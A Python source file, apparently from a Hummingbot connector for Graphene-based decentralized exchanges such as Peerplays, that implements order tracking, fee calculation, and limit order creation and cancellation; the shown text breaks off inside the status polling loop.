║ ╔═╗╦═╗╔═╗╔═╗╦ ╦╔═╗╔╗╔╔═╗ ╔╦╗╔═╗╔╦╗╔═╗╔╗╔╔═╗╔╦╗╔═╗ ║
║ ║ ╦╠╦╝╠═╣╠═╝╠═╣║╣ ║║║║╣ ║║║║╣ ║ ╠═╣║║║║ ║ ║║║╣ ║
║ ╚═╝╩╚═╩ ╩╩ ╩ ╩╚═╝╝╚╝╚═╝ ╩ ╩╚═╝ ╩ ╩ ╩╝╚╝╚═╝═╩╝╚═╝ ║
║ DECENTRALIZED EXCHANGE HUMMINGBOT CONNECTOR ║
╚════════════════════════════════════════════════════╝
~
forked from binance_exchange v1.0.0
~
"""
# STANDARD MODULES
import asyncio
import json
import logging
import time
from decimal import Decimal
from multiprocessing import Process
from threading import Thread
from typing import AsyncIterable, Dict, List, Optional
# METANODE MODULES
from metanode.graphene_metanode_client import GrapheneTrustlessClient
from metanode.graphene_metanode_server import GrapheneMetanode
# HUMMINGBOT MODULES
from hummingbot.connector.client_order_tracker import ClientOrderTracker
from hummingbot.connector.exchange.graphene import graphene_utils
from hummingbot.connector.exchange.graphene.graphene_api_order_book_data_source import \
GrapheneAPIOrderBookDataSource
from hummingbot.connector.exchange.graphene.graphene_auth import GrapheneAuth
from hummingbot.connector.exchange.graphene.graphene_constants import \
GrapheneConstants
from hummingbot.connector.exchange.graphene.graphene_order_book_tracker import \
GrapheneOrderBookTracker
from hummingbot.connector.exchange.graphene.graphene_user_stream_tracker import \
GrapheneUserStreamTracker
from hummingbot.connector.exchange_base import ExchangeBase
from hummingbot.connector.time_synchronizer import TimeSynchronizer
from hummingbot.connector.trading_rule import TradingRule
from hummingbot.core.data_type.cancellation_result import CancellationResult
from hummingbot.core.data_type.in_flight_order import (InFlightOrder,
OrderState, OrderUpdate,
TradeUpdate)
from hummingbot.core.data_type.limit_order import LimitOrder
from hummingbot.core.data_type.order_book import OrderBook
from hummingbot.core.data_type.trade_fee import (AddedToCostTradeFee,
DeductedFromReturnsTradeFee,
TokenAmount, TradeFeeBase)
from hummingbot.core.event.events import OrderType, TradeType
from hummingbot.core.network_iterator import NetworkStatus
from hummingbot.core.utils.async_utils import safe_ensure_future
from hummingbot.logger import HummingbotLogger
# GLOBAL CONSTANTS
DEV = False
def dprint(*data):
"""print for development"""
if DEV:
print(*data)
def dinput(data):
"""input for development"""
out = None
if DEV:
out = input(data)
return out
class GrapheneClientOrderTracker(ClientOrderTracker):
"""
add swap_order_id method to ClientOrderTracker
"""
def __init__(
self,
connector,
):
# ~ print("GrapheneClientOrderTracker")
super().__init__(connector)
def swap_id(
self,
client_order_id: Optional[str] = None,
exchange_order_id: Optional[str] = None,
) -> str:
"""
given client_order_id return exchange_order_id
given exchange_order_id return client_order_id
"""
if client_order_id and client_order_id in self.all_orders:
return self.all_orders[client_order_id].exchange_order_id
if exchange_order_id:
for order in self.all_orders.values():
if order.exchange_order_id == exchange_order_id:
return order.client_order_id
return None
class GrapheneExchange(ExchangeBase):
"""
the master class which ties together all DEX connector components
"""
# FIXME move to hummingbot constants
SHORT_POLL_INTERVAL = 5.0
UPDATE_ORDER_STATUS_MIN_INTERVAL = 10.0
LONG_POLL_INTERVAL = 120.0
_logger: Optional[HummingbotLogger] = None
def __init__(
self,
peerplays_wif: str,
domain: str = "peerplays",
trading_pairs: Optional[List[str]] = None,
trading_required: bool = True,
):
# ~ print(__class__.__name__)
# ~ print(
# ~ "GrapheneExchange", peerplays_wif, domain, trading_pairs, trading_required
# ~ )
self._time_synchronizer = TimeSynchronizer()
self.domain = domain
super().__init__()
self.domain = domain
self._wif = peerplays_wif
self._trading_pairs = trading_pairs
self._trading_required = trading_required
self._ev_loop = asyncio.get_event_loop()
self._poll_notifier = asyncio.Event()
# Dict[client_order_id:str, count:int]
self._order_not_found_records = {}
# Dict[trading_pair:str, TradingRule]
self._trading_rules = {}
# Dict[trading_pair:str, (maker_fee_percent:Dec, taker_fee_percent:Dec)]
self._trade_fees = {}
self._user_stream_event_listener_task = None
self._trading_rules_polling_task = None
self._user_stream_tracker_task = None
self._status_polling_task = None
self._metanode_process = None
self._last_timestamp = 0
self._last_poll_timestamp = 0
self._last_update_trade_fees_timestamp = 0
self._last_trades_poll_graphene_timestamp = 0
# initialize Graphene class objects
self.constants = GrapheneConstants(domain)
self.metanode = GrapheneTrustlessClient(self.constants)
self._metanode_server = GrapheneMetanode(self.constants)
self._order_tracker: ClientOrderTracker = GrapheneClientOrderTracker(
connector=self
)
self._order_book_tracker = GrapheneOrderBookTracker(
trading_pairs=trading_pairs,
domain=domain,
)
self._user_stream_tracker = GrapheneUserStreamTracker(
domain=domain,
order_tracker=self._order_tracker,
)
self._auth = GrapheneAuth(
wif=peerplays_wif,
domain=self.domain,
)
msg = (
"Authenticated" if self._auth.login()["result"] is True else "Login Failed"
)
self.dev_log(msg)
def dev_log(self, *args, **kwargs):
"""
log only in dev mode
"""
if DEV:
self.logger().info(*args, **kwargs)
@classmethod
def logger(cls) -> HummingbotLogger:
"""
a classmethod for logging
"""
if cls._logger is None:
cls._logger = logging.getLogger(__name__)
return cls._logger
@property
def name(self) -> str:
"""
the name of this graphene blockchain
"""
# self.dev_log("name")
return self.domain
@property
def order_books(self) -> Dict[str, OrderBook]:
"""
a dictionary keyed by pair of subdicts keyed bids/asks
"""
# self.dev_log("order_books")
return self._order_book_tracker.order_books
@property
def trading_rules(self) -> Dict[str, TradingRule]:
"""
a TradingRule object specific to a trading pair
"""
# self.dev_log("trading_rules")
return self._trading_rules
@property
def in_flight_orders(self) -> Dict[str, InFlightOrder]:
"""
a dict of active orders keyed by client id with relevant order tracking info
"""
# self.dev_log("in_flight_orders")
return self._order_tracker.active_orders
@property
def limit_orders(self) -> List[LimitOrder]:
"""
a list of LimitOrder objects
"""
# self.dev_log("limit_orders")
return [
in_flight_order.to_limit_order()
for in_flight_order in self.in_flight_orders.values()
]
@property
def tracking_states(self) -> Dict[str, any]:
"""
Returns a dictionary associating current active orders client id
to their JSON representation
"""
# self.dev_log("tracking_states")
return {key: value.to_json() for key, value in self.in_flight_orders.items()}
@property
def order_book_tracker(self) -> GrapheneOrderBookTracker:
"""
the class that tracks bids and asks for each pair
"""
# self.dev_log("order_book_tracker")
return self._order_book_tracker
@property
def user_stream_tracker(self) -> GrapheneUserStreamTracker:
"""
the class that tracks trades for each pair
"""
# self.dev_log("user_stream_tracker")
return self._user_stream_tracker
@property
def status_dict(self) -> Dict[str, bool]:
"""
Returns a dictionary with the values of all the conditions
that determine if the connector is ready to operate.
The key of each entry is the condition name,
and the value is True if condition is ready, False otherwise.
"""
# self.dev_log("status_dict")
# self._update_balances()
# ~ self.dev_log(self._account_balances)
return {
"symbols_mapping_initialized": (
GrapheneAPIOrderBookDataSource.trading_pair_symbol_map_ready(
domain=self.domain
)
),
"order_books_initialized": self._order_book_tracker.ready,
"account_balance": len(list(self._account_balances.values())) > 0
if self._trading_required
else True,
"trading_rule_initialized": len(self._trading_rules) > 0,
"metanode_live": 0 < time.time() - self.metanode.timing["blocktime"] < 100,
}
@property
def ready(self) -> bool:
"""
Returns True if the connector is ready to operate
(all connections established with the DEX).
If it is not ready it returns False.
"""
# self.dev_log("ready")
# ~ self.dev_log(self.status_dict)
return all(self.status_dict.values())
@staticmethod
def graphene_order_type(order_type: OrderType) -> str:
"""
LIMIT
"""
return order_type.name.upper()
@staticmethod
def to_hb_order_type(graphene_type: str) -> OrderType:
"""
OrderType.LIMIT
"""
return OrderType[graphene_type]
@staticmethod
def supported_order_types():
"""
a list containing only OrderType.LIMIT
"""
return [OrderType.LIMIT]
async def start_network(self):
"""
Start all required tasks to update the status of the connector.
Those tasks include:
- The order book tracker
- The polling loop to update the trading rules
- The polling loop to update order status and balance status using REST API
(backup for main update process)
"""
dprint("GrapheneExchange.start_network")
self._order_book_tracker.start()
dprint("Order Book Started")
self._trading_rules_polling_task = safe_ensure_future(
self._trading_rules_polling_loop()
)
dprint("Trading Rules Started")
# ~ if self._trading_required:
self._status_polling_task = safe_ensure_future(self._status_polling_loop())
dprint("Status Polling Started")
self._user_stream_tracker_task = safe_ensure_future(
self._user_stream_tracker.start()
)
dprint("User Stream Tracker Started")
self._user_stream_event_listener_task = safe_ensure_future(
self._user_stream_event_listener()
)
dprint("User Stream Listener Started")
async def stop_network(self):
"""
This function is executed when the connector is stopped.
It perform a general cleanup and stops all background
tasks that require the connection with the DEX to work.
"""
self.dev_log("GrapheneExchange.stop_network")
self.dev_log("Waiting for cancel_all...")
await asyncio.sleep(30)
self._last_timestamp = 0
self._last_poll_timestamp = 0
self._order_book_tracker.stop()
self._poll_notifier = asyncio.Event()
if self._status_polling_task is not None:
self._status_polling_task.cancel()
if self._user_stream_tracker_task is not None:
self._user_stream_tracker_task.cancel()
if self._trading_rules_polling_task is not None:
self._trading_rules_polling_task.cancel()
self._status_polling_task = self._user_stream_tracker_task = None
try:
if self.metanode:
self._metanode_process.join()
self._metanode_process.terminate()
except Exception as error:
self.dev_log("it appears there is no Metanode process to terminate")
self.dev_log(error)
async def check_network(self) -> NetworkStatus:
"""
ensure metanode blocktime is not stale, if it is, restart the metanode
"""
# self.dev_log("check_network")
status = NetworkStatus.NOT_CONNECTED
self.dev_log("Checking Network...")
try:
# if the metanode is less than 2 minutes stale, we're connected
# in practice, once live it should always pass this test
blocktime = self.metanode.timing["blocktime"]
latency = time.time() - blocktime
if 0 < latency < 60:
msg = f"Metanode Connected, latency {latency:.2f}"
self.dev_log(msg)
status = NetworkStatus.CONNECTED
# otherwise attempt to restart the metanode; eg. on startup
else:
self.dev_log("Deploying Metanode Server Process, please wait...")
self.dev_log(
"ALERT: Check your system monitor to ensure hardware compliance, "
"Metanode is cpu intensive, requires ram, and rapid read/write"
)
try:
self._metanode_process.join()
self._metanode_process.terminate()
except Exception:
pass
self._metanode_process = Process(target=self._metanode_server.deploy)
self._metanode_process.start()
# do not proceed until metanode is running
patience = 11
while True:
patience -= 1
msg = f"Metanode Server Initializing... patience={patience}"
if patience == -10:
msg = (
"I am out of patience.\n"
+ "It appears Metanode FAILED, check configuration and that"
+ " DEV mode is off."
)
self.dev_log(msg)
status = NetworkStatus.NOT_CONNECTED
break
self.dev_log(msg)
try:
# wait until less than one minute stale
blocktime = self.metanode.timing["blocktime"]
latency = time.time() - blocktime
if 0 < latency < 60:
msg = f"Metanode Connected, latency {latency:.2f}"
self.dev_log(msg)
status = NetworkStatus.CONNECTED
await asyncio.sleep(10)
break
except Exception as error:
self.dev_log(error)
await asyncio.sleep(6)
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
except Exception as error:
msg = f"check network failed {__name__} {error.args}"
self.logger().exception(msg)
return status
def restore_tracking_states(self, saved_states: Dict[str, any]):
"""
Restore in-flight orders from saved tracking states,
this is so the connector result pick up on where it left off
when it disconnects.
:param saved_states: The saved tracking_states.
"""
# self.dev_log("restore_tracking_states")
self._order_tracker.restore_tracking_states(tracking_states=saved_states)
def tick(self, timestamp: float):
"""
Includes the logic processed every time a new tick happens in the bot.
It enables execution of the status update polling loop using an event.
"""
self.dev_log("tick")
now = time.time()
poll_interval = (
self.SHORT_POLL_INTERVAL
if now - self.user_stream_tracker.last_recv_time > 60.0
else self.LONG_POLL_INTERVAL
)
last_tick = int(self._last_timestamp / poll_interval)
current_tick = int(timestamp / poll_interval)
if current_tick > last_tick:
if not self._poll_notifier.is_set():
self._poll_notifier.set()
self._last_timestamp = timestamp
def get_order_book(self, trading_pair: str) -> OrderBook:
"""
Returns the current order book for a particular market
:param trading_pair: BASE-QUOTE
"""
# self.dev_log("get_order_book")
if trading_pair not in self._order_book_tracker.order_books:
raise ValueError(f"No order book exists for '{trading_pair}'.")
return self._order_book_tracker.order_books[trading_pair]
def start_tracking_order(
self,
order_id: str,
exchange_order_id: Optional[str],
trading_pair: str,
trade_type: TradeType,
price: Decimal,
amount: Decimal,
order_type: OrderType,
):
"""
Starts tracking an order by adding it to the order tracker.
:param order_id: the order identifier
:param exchange_order_id: the identifier for the order in the DEX
:param trading_pair: BASE-QUOTE
:param trade_type: the type of order (buy or sell)
:param price: the price for the order
:param amount: the amount for the order
:order type: type of execution for the order (MARKET, LIMIT, LIMIT_MAKER)
"""
# self.dev_log("start_tracking_order")
self._order_tracker.start_tracking_order(
InFlightOrder(
client_order_id=order_id,
exchange_order_id=exchange_order_id,
trading_pair=trading_pair,
order_type=order_type,
trade_type=trade_type,
amount=amount,
price=price,
)
)
def stop_tracking_order(self, order_id: str):
"""
Stops tracking an order
:param order_id: The id of the order that will not be tracked any more
"""
# self.dev_log("stop_tracking_order")
self._order_tracker.stop_tracking_order(client_order_id=order_id)
def get_order_price_quantum(self, trading_pair: str, *_) -> Decimal:
"""
Used by quantize_order_price() in _limit_order_create()
Returns a price step, a minimum price increment for a given trading pair.
:param trading_pair: the trading pair to check for market conditions
:param price: the starting point price
"""
# self.dev_log("get_order_price_quantum")
trading_rule = self._trading_rules[trading_pair]
return trading_rule.min_price_increment
def get_order_size_quantum(self, trading_pair: str, *_) -> Decimal:
"""
Used by quantize_order_price() in _limit_order_create()
Returns an order amount step, a minimum amount increment for a given pair.
:param trading_pair: the trading pair to check for market conditions
:param order_size: the starting point order price
"""
# self.dev_log("get_order_size_quantum")
trading_rule = self._trading_rules[trading_pair]
return trading_rule.min_base_amount_increment
def quantize_order_amount(
self,
trading_pair: str,
amount: Decimal,
price: Decimal = Decimal(0),
) -> Decimal:
"""
Applies the trading rules to calculate the correct order amount for the market
:param trading_pair: the token pair for which the order will be created
:param amount: the intended amount for the order
:param price: the intended price for the order
:return: the quantized order amount after applying the trading rules
"""
# self.dev_log("quantize_order_amount")
trading_rule = self._trading_rules[trading_pair]
quantized_amount: Decimal = super().quantize_order_amount(trading_pair, amount)
# Check against min_order_size and min_notional_size.
# If not passing either check, return 0.
if quantized_amount < trading_rule.min_order_size:
return Decimal(0)
if price == Decimal(0):
current_price: Decimal = self.get_price(trading_pair, False)
notional_size = current_price * quantized_amount
else:
notional_size = price * quantized_amount
# Add 1% as a safety factor in case the prices changed while making the order.
if notional_size < trading_rule.min_notional_size * Decimal("1.01"):
return Decimal(0)
return quantized_amount
def get_fee(
self,
base_currency: str,
quote_currency: str,
_,# ~ order_type: OrderType,
order_side: TradeType, # TradeType.BUY TradeType.SELL
__,# ~ amount: Decimal,
___,# ~ price: Decimal = Decimal("nan"),
is_maker: Optional[bool] = None,
) -> TradeFeeBase:
"""
Calculates the estimated fee an order would pay
Graphene fees include a added flat transaction fee paid in core token; 1.3.0
AND a deducted percent based market fees paid in currency RECEIVED
market fees MAY have maker/taker functionality
"""
class GrapheneTradeFee(TradeFeeBase):
"""
a trade fee class which includes both Added and Deducted fees
"""
def get_fee_impact_on_order_cost(_):
"""
Added Fees
"""
return AddedToCostTradeFee.get_fee_impact_on_order_cost
def get_fee_impact_on_order_returns(_):
"""
Deducted Fees
"""
return DeductedFromReturnsTradeFee.get_fee_impact_on_order_returns
# self.dev_log("get_fee")
account = dict(self.metanode.account) # DISCRETE SQL QUERY
objects = dict(self.metanode.objects) # DISCRETE SQL QUERY
assets = dict(self.metanode.assets) # DISCRETE SQL QUERY
tx_currency = objects["1.3.0"]["name"]
tx_amount = account["fees_account"]["create"]
# you pay trade fee on the currency you receive in the transaction
trade_currency = quote_currency
maker_pct = assets[quote_currency]["fees_asset"]["fees"]["maker"]
taker_pct = assets[quote_currency]["fees_asset"]["fees"]["taker"]
if order_side == TradeType.BUY:
trade_currency = base_currency
maker_pct = assets[base_currency]["fees_asset"]["fees"]["maker"]
taker_pct = assets[base_currency]["fees_asset"]["fees"]["taker"]
trade_pct = maker_pct if is_maker else taker_pct
# build a TradeFeeBase class object
flat_fee = TokenAmount(token=tx_currency, amount=Decimal(tx_amount))
fee = GrapheneTradeFee(
flat_fees=[flat_fee],
percent=Decimal(trade_pct),
# handle TradeFeeBase warning; do not specify token if its quote token
percent_token=trade_currency if trade_currency != quote_currency else None,
)
################################################################################
# FIXME the hummingbot binance reference is a path to deprecation warning
################################################################################
# there appears to be no functional reference material, see:
# ~
# ~ BitshareExchange
## ~ ExchangeBase
### ~ ConnectorBase
#### ~ estimate_fee_pct
##### ~ core.utils.estimate_fee.estimate_fee < binance ends here not implemented
################################################################################
# FIXME just return ZERO like this? peer review please
# return DeductedFromReturnsTradeFee(percent=self.estimate_fee_pct(False))
################################################################################
return fee
def buy(
self,
trading_pair: str,
amount: Decimal,
order_type: OrderType = OrderType.LIMIT,
price: Decimal = Decimal("nan"),
**__,
) -> str:
"""
Creates a promise to create a buy order using the parameters.
:param trading_pair: the token pair to operate with
:param amount: the order amount
:param order_type: all graphene orders are LIMIT type
:param price: the order price
:return: the id assigned by the connector to the order (the client id)
"""
# self.dev_log("buy")
order_id = graphene_utils.get_new_client_order_id(
is_buy=True, trading_pair=trading_pair
)
safe_ensure_future(
self._limit_order_create(
TradeType.BUY, order_id, trading_pair, amount, order_type, price
)
)
return order_id
def sell(
self,
trading_pair: str,
amount: Decimal,
order_type: OrderType = OrderType.LIMIT,
price: Decimal = Decimal("nan"),
**__,
) -> str:
"""
Creates a promise to create a sell order using the parameters.
:param trading_pair: the token pair to operate with
:param amount: the order amount
:param order_type: all graphene orders are LIMIT type
:param price: the order price
:return: the id assigned by the connector to the order (the client id)
"""
# self.dev_log("sell")
order_id = graphene_utils.get_new_client_order_id(
is_buy=False, trading_pair=trading_pair
)
safe_ensure_future(
self._limit_order_create(
TradeType.SELL, order_id, trading_pair, amount, order_type, price
)
)
return order_id
def cancel(self, trading_pair: str, order_id: str):
"""
Creates a promise to cancel an order in the DEX
:param trading_pair: the trading pair the order to cancel operates with
:param order_id: the client id of the order to cancel
:return: the client id of the order to cancel
"""
# self.dev_log("cancel")
safe_ensure_future(
self._limit_order_cancel(
trading_pair=trading_pair,
client_order_id=order_id,
)
)
return order_id
async def cancel_all(self, _) -> List[CancellationResult]:
"""
Cancels all currently active orders.
The cancellations are batched at the core level into groups of 20 per tx
Used by bot's top level stop and exit commands
(cancelling outstanding orders on exit)
:param timeout_seconds: the maximum time in seconds the cancel logic should run
:return: a list of CancellationResult instances, one for each of the order
"""
# self.dev_log("cancel_all")
# get an order id set of known open orders hummingbot is tracking
# change each OrderState to PENDING_CANCEL
await asyncio.sleep(0.01)
open_client_ids = {
o.client_order_id for o in self.in_flight_orders.values() if not o.is_done
}
await asyncio.sleep(0.01)
msg = f"open_client_ids {len(open_client_ids)} {open_client_ids}"
self.dev_log(msg)
open_exchange_ids = {
self._order_tracker.swap_id(i)
for i in open_client_ids
if self._order_tracker.swap_id(i) is not None
}
open_ids = {
self._order_tracker.swap_id(i): i
for i in open_client_ids
if self._order_tracker.swap_id(i) is not None
}
await asyncio.sleep(0.01)
# log open orders in client and DEX terms
msg = f"open_exchange_ids {len(open_exchange_ids)} {open_exchange_ids}"
self.dev_log(msg)
await asyncio.sleep(0.01)
for order_id in open_client_ids:
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
trading_pair=self.in_flight_orders[order_id].trading_pair,
update_timestamp=int(time.time() * 1e3),
new_state=OrderState.PENDING_CANCEL,
)
self._order_tracker.process_order_update(order_update)
await asyncio.sleep(0.01)
cancelled_exchange_ids = []
for pair in self._trading_pairs:
# build a cancel all operation using the broker(order) method
order = json.loads(self._auth.prototype_order(pair))
# order["edicts"] = [{"op": "cancel", "ids": list(open_exchange_ids)}]
order["edicts"] = [{"op": "cancel", "ids": ["1.7.X"]}]
await asyncio.sleep(0.01)
# cancel all and get a cancellation result list of DEX order ids
self.dev_log(order)
cancelled_exchange_ids.extend((await self._broker(order))["result"])
# cancelled_exchange_ids.extend(self._auth.broker(order))
# ~ signal = Value("i", 0)
# ~ auth = Value("i", 0)
# ~ manager = Manager()
# ~ trx_data = manager.Value(ctypes.c_wchar_p, "")
# ~ self.dev_log(order)
# ~ self.dev_log(signal.value)
# ~ cancelled_exchange_ids = self._auth._execute(signal, auth, trx_data, order)
# ~ self.dev_log(signal.value)
# ~ while not signal.value:
# ~ await asyncio.sleep(1)
# ~ self.dev_log(signal.value)
# ~ self.dev_log("Waiting for manualSIGNING")
# ~ self.dev_log(signal.value)
# ~ self.dev_log(trx_data.value)
# ~ cancelled_exchange_ids = cancelled_exchange_ids["result"]
msg = (
f"cancelled_exchange_ids {len(cancelled_exchange_ids)}"
+ f" {cancelled_exchange_ids}"
)
self.dev_log(msg)
# swap the list to hummingbot client ids
cancelled_client_ids = [open_ids[i] for i in cancelled_exchange_ids]
await asyncio.sleep(0.01)
# log cancelled orders in client and DEX terms
msg = f"cancelled_client_ids {len(cancelled_client_ids)} {cancelled_client_ids}"
self.dev_log(msg)
await asyncio.sleep(0.01)
# create a list of successful CancellationResult
# change each OrderState to CANCELLED
successful_cancellations = []
for order_id in cancelled_client_ids:
successful_cancellations.append(CancellationResult(order_id, True))
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
trading_pair=self.in_flight_orders[order_id].trading_pair,
update_timestamp=int(time.time() * 1e3),
new_state=OrderState.CANCELLED,
)
# ~ self._order_tracker.process_order_update(order_update)
msg = (
f"successful_cancellations {len(successful_cancellations)}"
+ f" {successful_cancellations}"
)
self.dev_log(msg)
# create a list of apparently failed CancellationResult
# change each OrderState back to OPEN
await asyncio.sleep(0.01)
failed_cancellations = []
for order_id in open_client_ids: # client order ids
if order_id not in cancelled_client_ids:
failed_cancellations.append(CancellationResult(order_id, False))
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
trading_pair=self.in_flight_orders[order_id].trading_pair,
update_timestamp=int(time.time() * 1e3),
new_state=OrderState.OPEN,
)
# ~ self._order_tracker.process_order_update(order_update)
await asyncio.sleep(0.01)
# log successful and failed cancellations
msg = (
f"failed_cancellations {len(failed_cancellations)}"
+ f" {failed_cancellations}"
)
self.dev_log(msg)
await asyncio.sleep(0.01)
# join the lists and return
return successful_cancellations + failed_cancellations
async def _broker(self, order):
self.dev_log("self._broker")
ret = {}
borker = Thread(
target=self._auth.broker,
args=(
order,
ret,
),
)
borker.start()
self.dev_log(ret)
while not ret:
await asyncio.sleep(1)
self.dev_log("Waiting for manualSIGNING")
self.dev_log(ret)
return ret
async def _limit_order_create(
self,
trade_type: TradeType,
order_id: str,
trading_pair: str,
amount: Decimal,
order_type: OrderType,
price: Optional[Decimal] = Decimal("NaN"),
):
"""
Creates a an order in the DEX using the parameters to configure it
:param trade_type: the side of the order (BUY of SELL)
:param order_id: the id that should be assigned to the order (the client id)
:param trading_pair: the token pair to operate with
:param amount: the order amount
:param order_type: the type of order to create (MARKET, LIMIT, LIMIT_MAKER)
:param price: the order price
"""
# self.dev_log("_limit_order_create")
self.dev_log("############### LIMIT ORDER CREATE ATTEMPT ###############")
self.dev_log(trade_type)
self.dev_log(order_type)
self.dev_log(order_id)
self.dev_log(trading_pair)
self.dev_log(amount)
self.dev_log(price)
if self._wif == "":
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
exchange_order_id=order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.OPEN,
)
self._order_tracker.process_order_update(order_update)
return
# get trading rules and normalize price and amount
trading_rule: TradingRule = self._trading_rules[trading_pair]
price = self.quantize_order_price(trading_pair, price)
quantize_amount_price = Decimal("0") if price.is_nan() else price
amount = self.quantize_order_amount(
trading_pair=trading_pair, amount=amount, price=quantize_amount_price
)
# create an inflight order keyed by client order_id
self.start_tracking_order(
order_id=order_id,
exchange_order_id=None,
trading_pair=trading_pair,
trade_type=trade_type,
price=price,
amount=amount,
order_type=order_type,
)
# if the amount is too little disregard the order
# update tracking status to FAILED
if amount < trading_rule.min_order_size:
msg = (
f"{trade_type.name.title()} order amount {amount} is lower than the"
f" minimum order size {trading_rule.min_order_size}. The order will not"
" be created."
)
self.logger().warning(msg)
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.FAILED,
)
self._order_tracker.process_order_update(order_update)
return
# format an order, broadcast to the blockchain
# update tracking status to OPEN
try:
order = json.loads(self._auth.prototype_order(trading_pair))
self.dev_log(order)
self.dev_log(trade_type)
order["edicts"] = [
{
"op": "buy" if trade_type == TradeType.BUY else "sell",
"amount": float(amount),
"price": float(price),
"expiration": 0,
},
]
self.dev_log(order)
await asyncio.sleep(0.01)
result = await self._broker(order)
# ~ {"method": "notice",
# ~ "params": [1, [{
# ~ "id": "9c91cd07aa2844473cc3c6047ec2c4f7ce40c8c1",
# ~ "block_num": 66499124,
# ~ "trx_num": 0,
# ~ "trx": {
# ~ "ref_block_num": 45619,
# ~ "ref_block_prefix": 3851304488,
# ~ "expiration": "2022-02-20T20:12:06",
# ~ "operations": [
# ~ [1, {
# ~ "fee": {
# ~ "amount": 48260,
# ~ "asset_id": "1.3.0"
# ~ },
# ~ "seller": "1.2.743179",
# ~ "amount_to_sell": {
# ~ "amount": 5,
# ~ "asset_id": "1.3.5640"
# ~ },
# ~ "min_to_receive": {
# ~ "amount": 1000000,
# ~ "asset_id": "1.3.0"
# ~ },
# ~ "expiration": "2096-10-02T07:06:40",
# ~ "fill_or_kill": false,
# ~ "extensions": []}],
# ~ [1, {
# ~ "fee": {
# ~ "amount": 48260,
# ~ "asset_id": "1.3.0"
# ~ },
# ~ "seller": "1.2.743179",
# ~ "amount_to_sell": {
# ~ "amount": 1000000,
# ~ "asset_id": "1.3.0"
# ~ },
# ~ "min_to_receive": {
# ~ "amount": 5,
# ~ "asset_id": "1.3.5640"
# ~ },
# ~ "expiration": "2096-10-02T07:06:40",
# ~ "fill_or_kill": false,
# ~ "extensions": []}]],
# ~ "extensions": [],
# ~ "signatures": [
# ~ "1f1fa0acde...d80f8254c6"
# ~ ],
# ~ "operation_results": [
# ~ [1, {"1.7.490017546"],
# ~ [1, {"1.7.490017547" ]]}}]]}
############################################################################
if isinstance(result, dict) and result["status"]:
exchange_order_id = result["result"]["params"][1][0]["trx"][
"operation_results"
][0][1]
########################################################################
# update_timestamp = int(result["blocknum"])
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
exchange_order_id=exchange_order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.OPEN,
)
self._order_tracker.process_order_update(order_update)
else:
raise ValueError("DEX did not return an order id")
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
# if anything goes wrong log stack trace
# update tracking status to FAILED
except Exception as error:
self.logger().network(
"Error submitting order to Graphene for "
f"{amount} {trading_pair} "
f"{price}.",
exc_info=True,
app_warning_msg=str(error),
)
order_update: OrderUpdate = OrderUpdate(
client_order_id=order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.FAILED,
)
self._order_tracker.process_order_update(order_update)
async def _limit_order_cancel(
self,
trading_pair: str,
client_order_id: str,
) -> list: # of exchange_order_id
"""
Requests the DEX to cancel an active order
:param trading_pair: the trading pair the order to cancel operates with
:param client_order_id: the client id of the order to cancel
"""
self.dev_log(f"CANCELLING ORDER #{client_order_id}")
if self._wif == "":
order_update: OrderUpdate = OrderUpdate(
client_order_id=client_order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.CANCELLED,
)
self._order_tracker.process_order_update(order_update)
self.dev_log("############# PAPER #############")
self.dev_log("ORDER STATUS UPDATED TO CANCELLED")
self.dev_log("#################################")
return [client_order_id]
# self.dev_log("_limit_order_cancel")
result = None
tracked_order = self._order_tracker.fetch_tracked_order(client_order_id)
# if this order was placed by hummingbot
if tracked_order is not None:
# change its status to pending cancellation
order_update: OrderUpdate = OrderUpdate(
client_order_id=client_order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.PENDING_CANCEL,
)
self._order_tracker.process_order_update(order_update)
# attempt to cancel the order
try:
order = json.loads(self._auth.prototype_order(trading_pair))
order["header"]["wif"] = self._wif
order["edicts"] = [
{"op": "cancel", "ids": [tracked_order.exchange_order_id]}
]
result = await self._broker(order)
self.dev_log(f"CANCELLED ORDER #{client_order_id}")
except asyncio.CancelledError:
msg = f"asyncio.CancelledError {__name__}"
self.logger().exception(msg)
raise
except Exception:
msg = (
"There was a an error when requesting cancellation of order "
f"{client_order_id}"
)
self.logger().exception(msg)
raise
################################################################################
# if the result from the cancellation attempt contains the DEX order id
# update the status to CANCELLED
self.dev_log(result["result"])
if (
isinstance(result["result"], list)
and result["result"]
and result["result"][0] == tracked_order.exchange_order_id
):
order_update: OrderUpdate = OrderUpdate(
client_order_id=client_order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.CANCELLED,
)
self._order_tracker.process_order_update(order_update)
self.dev_log("ORDER STATUS UPDATED TO CANCELLED")
# otherwise return the order state to open
else:
order_update: OrderUpdate = OrderUpdate(
client_order_id=client_order_id,
trading_pair=trading_pair,
update_timestamp=int(self.current_timestamp * 1e3),
new_state=OrderState.OPEN,
)
self.dev_log("ORDER STATUS RETURNED TO OPEN")
self._order_tracker.process_order_update(order_update)
# return the list of cancellation results
return result["result"]
################################################################################
async def _status_polling_loop(self):
"""
Performs all required operations to keep the connector synchronized
with the DEX. It also updates the time synchronizer.
Executes when the _poll_notifier event is enabled by the `tick` function.
"""
while True:
try:
self.dev_log("###########STATUS#POLLING#LOOP#OCCOURING##########")
while not self._poll_notifier.is_set():
await asyncio.sleep(1)
self.dev_log("LOOP IS " + str(self._poll_notifier))
# ~ await self._poll_notifier.wait()
self.dev_log("###################NOTIFIER#######################")
await self._update_time_synchronizer()
